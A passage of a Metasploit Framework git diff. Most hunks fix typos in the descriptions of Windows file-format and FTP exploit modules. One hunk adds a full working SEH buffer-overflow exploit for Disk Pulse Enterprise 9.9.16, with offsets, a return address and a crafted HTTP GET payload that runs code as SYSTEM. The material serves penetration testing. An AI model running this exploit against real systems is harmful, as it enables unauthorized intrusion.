a filename out of the string, - and then copy it on the stack without any proper bounds checking, which casues a - buffer overflow, and results arbitrary code execution under the context of the user. + and then copy it on the stack without any proper bounds checking, which causes a + buffer overflow, and results in arbitrary code execution under the context of the user. This module has been designed to target common Windows systems such as: Windows XP SP2/SP3, Windows Vista, and Windows 7. diff --git a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb index 90f519af7f..5651182f92 100644 --- a/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb +++ b/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control - (KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's + This module exploits a stack buffer overflow in the KeyWorks KeyHelp ActiveX Control + (KeyHelp.ocx 1.2.3120.0). This ActiveX Control comes bundled with EMC's Documentation ApplicationXtender 5.4. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb index d03f35da23..0b9cf634b0 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow vulnerability found in ERS Viewer 2011 (version 11.04). The vulnerability exists in the module ermapper_u.dll where the - function ERM_convert_to_correct_webpath handles user provided data in a insecure + function ERM_convert_to_correct_webpath handles user provided data in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2011 (version 11.04) on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb index 9b66759feb..bf27a30630 100644 --- a/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb +++ b/modules/exploits/windows/fileformat/erdas_er_viewer_rf_report_error.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function - rf_report_error handles user provided data in a insecure way. It results in + rf_report_error handles user provided data in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This module has been tested successfully with ERS Viewer 2013 (versions 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb index 0df68d115f..fd32c41ba7 100644 --- a/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb +++ b/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HTML Help Workshop 4.74 - By creating a specially crafted hhp file, an an attacker may be able + By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/homm3_h3m.rb b/modules/exploits/windows/fileformat/homm3_h3m.rb index 27becb3a0b..f73c16b86e 100644 --- a/modules/exploits/windows/fileformat/homm3_h3m.rb +++ b/modules/exploits/windows/fileformat/homm3_h3m.rb @@ -14,9 +14,9 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Heroes of Might and Magic III .h3m Map file Buffer Overflow', 'Description' => %q{ - This module embeds an exploit into an ucompressed map file (.h3m) for + This module embeds an exploit into an uncompressed map file (.h3m) for Heroes of Might and Magic III. Once the map is started in-game, a - buffer overflow occuring when loading object sprite names leads to + buffer overflow occurring when loading object sprite names leads to shellcode execution. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb index d019940329..bcb783a8e6 100644 --- a/modules/exploits/windows/fileformat/ibm_pcm_ws.rb +++ b/modules/exploits/windows/fileformat/ibm_pcm_ws.rb @@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote saved RETURN address at offset 0x6c is overwritten by the data written past the buffer. To ensure we can perform arbitrary code execution we must we provide a valid pointer at - 0x74 which is used as a argument for the called function at 0x675751ED as a id file + 0x74 which is used as an argument for the called function at 0x675751ED as an id file extension parameter. Once the caller regains control we will reach our RETURN. The Ret - instruction will be used to pop the overwritten saved return address which was currupted. + instruction will be used to pop the overwritten saved return address which was corrupted. This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform. diff --git a/modules/exploits/windows/fileformat/icofx_bof.rb b/modules/exploits/windows/fileformat/icofx_bof.rb index b8c077826b..ca331f261f 100644 --- a/modules/exploits/windows/fileformat/icofx_bof.rb +++ b/modules/exploits/windows/fileformat/icofx_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'IcoFX Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in version 2.1 - of IcoFX. The vulnerability exists while parsing .ICO files, where an specially + of IcoFX. The vulnerability exists while parsing .ICO files, where a specially crafted ICONDIR header providing an arbitrary long number of images in the file can be used to trigger the overflow when reading the ICONDIRENTRY structures. }, diff --git a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb index 69c7b6b75b..55d9ea8665 100644 --- a/modules/exploits/windows/fileformat/ideal_migration_ipj.rb +++ b/modules/exploits/windows/fileformat/ideal_migration_ipj.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable. - By creating a specially crafted ipj file, an an attacker may be able + By creating a specially crafted ipj file, an attacker may be able to execute arbitrary code. NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH diff --git a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb index 25671a1821..3578da270b 100644 --- a/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb +++ b/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb @@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the - local system. However, if the victim machine is connected to a remote share ( - or something similiar), then it's also possible to execute arbitrary code. + local system. However, if the victim machine is connected to a remote share + (or something similar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine. diff --git a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb index 78737e1c96..90471410e1 100644 --- a/modules/exploits/windows/fileformat/millenium_mp3_pls.rb +++ b/modules/exploits/windows/fileformat/millenium_mp3_pls.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio. + PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio. This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb index 2a628a4b61..2bde64298e 100644 --- a/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb +++ b/modules/exploits/windows/fileformat/mjm_coreplayer2011_s3m.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'MJM Core Player 2011 .s3m Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in MJM Core Player 2011 - When opening a malicious s3m file in this applications, a stack buffer overflow can be + When opening a malicious s3m file in this application, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7. }, diff --git a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb index 499ada665d..9d13c5f2a5 100644 --- a/modules/exploits/windows/fileformat/mplayer_sami_bof.rb +++ b/modules/exploits/windows/fileformat/mplayer_sami_bof.rb @@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack-based buffer overflow found in the handling of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently - targets SMPlayer 0.6.8, which is distributed with a vulnerable version of mplayer. + targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer. The overflow is triggered when an unsuspecting victim opens a movie file first, followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also - be done from the console with the mplayer "-sub" option. + be done from the console with the MPlayer "-sub" option. }, 'License' => MSF_LICENSE, 'Author' => [ diff --git a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb index 03aab1aec2..e5c0dbbf67 100644 --- a/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb +++ b/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code - exection. + execution. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing. diff --git a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb index 73db9b695e..d26da87e6a 100644 --- a/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb +++ b/modules/exploits/windows/fileformat/ms10_038_excel_obj_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP. By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker - can get the control of the excution flow. This results aribrary code execution under + can get the control of the execution flow. This results in arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb index 0514c39ea8..00b0a02650 100644 --- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb +++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a vulnerability found in Excel of Microsoft Office 2007. By supplying a malformed .xlb file, an attacker can control the content (source) of a memcpy routine, and the number of bytes to copy, therefore causing a stack- - based buffer overflow. This results aribrary code execution under the context of - user the user. + based buffer overflow. This results in arbitrary code execution under the context of + the user. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb index 5ba12c0a2b..4d8220ad71 100644 --- a/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb +++ b/modules/exploits/windows/fileformat/ms_visual_basic_vbp.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Microsoft Visual Basic VBP Buffer Overflow', 'Description' => %q{ - This module exploits a stack oveflow in Microsoft Visual + This module exploits a stack overflow in Microsoft Visual Basic 6.0. When a specially crafted vbp file containing a long reference line, an attacker may be able to execute arbitrary code. diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb index 4d9e5cef47..5b77143ba6 100644 --- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb +++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb @@ -41,8 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a drawing in Microsoft Office, and how it gets calculated with user-controlled inputs, and stored in the EAX register. The 32-bit register will run out of storage space to - represent the large vlaue, which ends up being 0, but it still gets pushed as a - dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a + represent the large value, which ends up being 0, but it still gets pushed as a + dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a chunk anyway with size 0, and the address of this chunk is used as the destination buffer of a memcpy function, where the source buffer is the EXIF data (an extended image format supported by TIFF), and is also user-controlled. A function pointer in the chunk returned diff --git a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb index 7b73294ad7..2470394aa7 100644 --- a/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb +++ b/modules/exploits/windows/fileformat/orbit_download_failed_bof.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Orbit Downloader URL Unicode Conversion Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in Orbit Downloader. - The vulnerability is due to Orbit converting an URL ascii string to unicode - in a insecure way with MultiByteToWideChar. + The vulnerability is due to Orbit converting a URL ascii string to unicode + in an insecure way with MultiByteToWideChar. The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the "File->Add Metalink..." option. }, diff --git a/modules/exploits/windows/fileformat/shaper_pdf_bof.rb b/modules/exploits/windows/fileformat/shaper_pdf_bof.rb index 3f1268d324..1d628f94e8 100644 --- a/modules/exploits/windows/fileformat/shaper_pdf_bof.rb +++ b/modules/exploits/windows/fileformat/shaper_pdf_bof.rb @@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'PDF Shaper Buffer Overflow', 'Description' => %q{ PDF Shaper is prone to a security vulnerability when processing PDF files. - The vulnerability appear when we use Convert PDF to Image and use a specially - crafted PDF file. This module has been tested successfully on Win Xp, Win 7, + The vulnerability appears when we use Convert PDF to Image and use a specially + crafted PDF file. This module has been tested successfully on Win XP, Win 7, Win 8, Win 10. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb index f9109ee076..41f46b13aa 100644 --- a/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb +++ b/modules/exploits/windows/fileformat/total_video_player_ini_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability - occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\". + occurs opening malformed Settings.ini file e.g. "C:\Program Files\Total Video Player\". This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb index b4906989b6..90ac34302f 100644 --- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb +++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote execution. A patch is available at visiwave.com; the fix is done by XORing the return value as null if no match is found, and then it is validated before use. - NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a + NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a victim user to 'double click' the malicious VWR file and execute code. This module was also built to bypass ASLR and DEP. }, diff --git a/modules/exploits/windows/fileformat/vlc_smb_uri.rb b/modules/exploits/windows/fileformat/vlc_smb_uri.rb index 0c5cf632e8..806c8bc757 100644 --- a/modules/exploits/windows/fileformat/vlc_smb_uri.rb +++ b/modules/exploits/windows/fileformat/vlc_smb_uri.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in the Win32AddConnection - function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are + function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are reportedly affected. This vulnerability is only present in Win32 builds of VLC. diff --git a/modules/exploits/windows/fileformat/vuplayer_cue.rb b/modules/exploits/windows/fileformat/vuplayer_cue.rb index 069d0c259f..dd0167afe8 100644 --- a/modules/exploits/windows/fileformat/vuplayer_cue.rb +++ b/modules/exploits/windows/fileformat/vuplayer_cue.rb @@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'VUPlayer CUE Buffer Overflow', 'Description' => %q{ - This module exploits a stack over flow in VUPlayer <= 2.49. When - the application is used to open a specially crafted cue file, an buffer is overwritten allowing + This module exploits a stack based overflow in VUPlayer <= 2.49. When + the application is used to open a specially crafted cue file, a buffer is overwritten allowing for the execution of arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/winamp_maki_bof.rb b/modules/exploits/windows/fileformat/winamp_maki_bof.rb index de294f91d3..de79640252 100644 --- a/modules/exploits/windows/fileformat/winamp_maki_bof.rb +++ b/modules/exploits/windows/fileformat/winamp_maki_bof.rb @@ -15,9 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file, - where memmove is used with in a insecure way with user controlled data. + where memmove is used in an insecure way with user controlled data. - To exploit the vulnerability the attacker must convince the attacker to install the + To exploit the vulnerability the attacker must convince the victim to install the generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb index c6fff6e62f..c8e9bee1a8 100644 --- a/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb +++ b/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow', 'Description' => %q{ This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5 - by generating an malicious file.) + by generating a malicious file. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb index 730fb7d347..39b8b166cf 100644 --- a/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb +++ b/modules/exploits/windows/fileformat/zinfaudioplayer221_pls.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Zinf. + PLS file within a browser, when the PLS extension is registered to Zinf. This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb index c0cf7abc37..d20f38a6dd 100644 --- a/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb +++ b/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability', 'Description' => %q{ This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially - crafted format string specifier as a username. The crafted username is sent to to the server to + crafted format string specifier as a username. The crafted username is sent to the server to overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code. The SEH exit function is preferred so that the administrators are not left with an unhandled diff --git a/modules/exploits/windows/ftp/freeftpd_pass.rb b/modules/exploits/windows/ftp/freeftpd_pass.rb index 4815eac563..4be8f558fe 100644 --- a/modules/exploits/windows/ftp/freeftpd_pass.rb +++ b/modules/exploits/windows/ftp/freeftpd_pass.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote PASS command. This may allow a remote attacker to cause a buffer overflow, resulting in a denial of service or allow the execution of arbitrary code. - FreeFTPd must have an account set to authorization anonymous user account. + freeFTPd must have an account set to authorization anonymous user account. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb index 46528829a6..590eabf90b 100644 --- a/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb +++ b/modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb @@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'FTPShell 5.1 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets - triggered when the ftp clients tries to process an overly response to a PWD command. - This will overwrite the saved EIP and structured exception handler. + triggered when the ftp client tries to process an overly long response to a PWD + command. This will overwrite the saved EIP and structured exception handler. }, 'Author' => [ diff --git a/modules/exploits/windows/ftp/httpdx_tolog_format.rb b/modules/exploits/windows/ftp/httpdx_tolog_format.rb index b866d5d4a1..10d42e2050 100644 --- a/modules/exploits/windows/ftp/httpdx_tolog_format.rb +++ b/modules/exploits/windows/ftp/httpdx_tolog_format.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'HTTPDX tolog() Function Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in HTTPDX FTP server. - By sending an specially crafted FTP command containing format specifiers, an + By sending a specially crafted FTP command containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user diff --git a/modules/exploits/windows/ftp/pcman_put.rb b/modules/exploits/windows/ftp/pcman_put.rb index 8b091a6b9a..62b21be60f 100644 --- a/modules/exploits/windows/ftp/pcman_put.rb +++ b/modules/exploits/windows/ftp/pcman_put.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow vulnerability found in the PUT command of the PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous - credientials are enabled. + credentials are enabled. }, 'Author' => [ diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index a34ac6221e..2ab92a7b0f 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote vulnerability that is triggered when processing a sufficiently long filename during a FTP LIST command resulting in overwriting the exception handler. Social engineering of executing a specially crafted - ftp file by double click will result in connecting to our malcious + ftp file by double click will result in connecting to our malicious server and perform arbitrary code execution which allows the attacker to gain the same rights as the user running ScriptFTP. This vulnerability affects versions 3.3 and earlier. diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index a0544f319d..503b5f12cf 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Seagull FTP v3.3 Build 409 Stack Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the Seagull FTP client that gets - triggered when the ftp clients processes a response to a LIST command. If the + triggered when the ftp client processes a response to a LIST command. If the response contains an overly long file/folder name, a buffer overflow occurs, overwriting a structured exception handler. }, diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index f7f5fa6061..d48f9e4942 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Vermillion FTP Daemon PORT Command Memory Corruption', 'Description' => %q{ This module exploits an out-of-bounds array access in the Arcane Software - Vermillion FTP server. By sending an specially crafted FTP PORT command, + Vermillion FTP server. By sending a specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bound by attacker @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote Processing is done using a source ptr (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments - the the destination pointer. If an ascii digit [0-9] is encountered, the + the destination pointer. If an ascii digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index 4751f4b74e..a2c328e275 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in Xlink FTP Client 32 Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2. - When a overly long FTP server response is recieved by a client, + When an overly long FTP server response is received by a client, arbitrary code may be executed. }, 'Author' => [ 'MC' ], diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index d87637f8dd..17278ba87a 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a - long JSESSION cookie value can lead to arbirtary code execution. + long JSESSION cookie value can lead to arbitrary code execution. }, 'Author' => 'pusscat', 'References' => diff --git a/modules/exploits/windows/http/disk_pulse_enterprise_get.rb b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb new file mode 100644 index 0000000000..bc878b6b7e --- /dev/null +++ b/modules/exploits/windows/http/disk_pulse_enterprise_get.rb @@ -0,0 +1,92 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Pulse Enterprise GET Buffer Overflow', + 'Description' => %q( + This module exploits an SEH buffer overflow in Disk Pulse Enterprise + 9.9.16. If a malicious user sends a crafted HTTP GET request + it is possible to execute a payload that would run under the Windows + NT AUTHORITY\SYSTEM account. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Chance Johnson', # msf module - albatross@loftwing.net + 'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com + ], + 'References' => + [ + [ 'EDB', '42560' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'EncoderType' => "alpha_mixed", + 'BadChars' => "\x00\x0a\x0d\x26" + }, + 'Targets' => + [ + [ 'Disk Pulse Enterprise 9.9.16', + { + 'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll + 'Offset' => 2492 + }] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Aug 25 2017', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(80)]) + end + + def check + res = send_request_cgi( + 'uri' => '/', + 'method' => 'GET' + ) + + if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/ + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def exploit + connect + + print_status("Generating exploit...") + exp = payload.encoded + exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset + exp << generate_seh_record(target.ret) + exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode + exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start + exp << 'B' * (5000 - exp.length) # padding + + print_status("Sending exploit...") + + send_request_cgi( + 'uri' => '/../' + exp, + 'method' => 'GET', + 'host' => '4.2.2.2', + 'connection' => 'keep-alive' + ) + + handler + disconnect + end +end diff --git a/modules/exploits/windows/http/hp_autopass_license_traversal.rb b/modules/exploits/windows/http/hp_autopass_license_traversal.rb index dfe079ce46..33b54389da 100644 --- a/modules/exploits/windows/http/hp_autopass_license_traversal.rb +++ b/modules/exploits/windows/http/hp_autopass_license_traversal.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a code execution flaw in HP AutoPass License Server. It abuses two weaknesses in order to get its objective. First, the AutoPass application doesn't enforce - authentication in the CommunicationServlet component. Seond, it's possible to abuse a + authentication in the CommunicationServlet component. 